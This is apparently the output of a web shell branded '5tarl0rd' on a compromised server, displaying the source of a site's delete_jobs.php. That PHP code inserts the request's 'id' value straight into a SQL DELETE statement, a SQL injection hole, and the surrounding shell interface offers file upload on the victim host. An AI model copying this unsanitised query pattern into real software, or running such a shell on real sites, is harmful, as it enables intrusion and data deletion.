5tarl0rd

Current Path : /home/tiporg/www/manage/
Upload File :
Current File : /home/tiporg/www/manage/delete_jobs.php

<?php

include("classes/access_user_class.php"); 



	$sql = "delete from tbl_jobs where id = '".$_REQUEST['id']."'"; 



mysql_query($sql) or die(mysql_error());



$message = "Jobs has been deleted successfully"; 



?>

<script>

	self.location = "jobs.php?mess=<?php echo $message; ?>";

	</script>	




5tarL0rd By 5tarl0rd Being Anonymous